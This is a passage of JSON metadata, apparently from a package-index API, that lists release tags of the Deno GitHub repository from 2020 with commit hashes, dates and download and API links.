"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323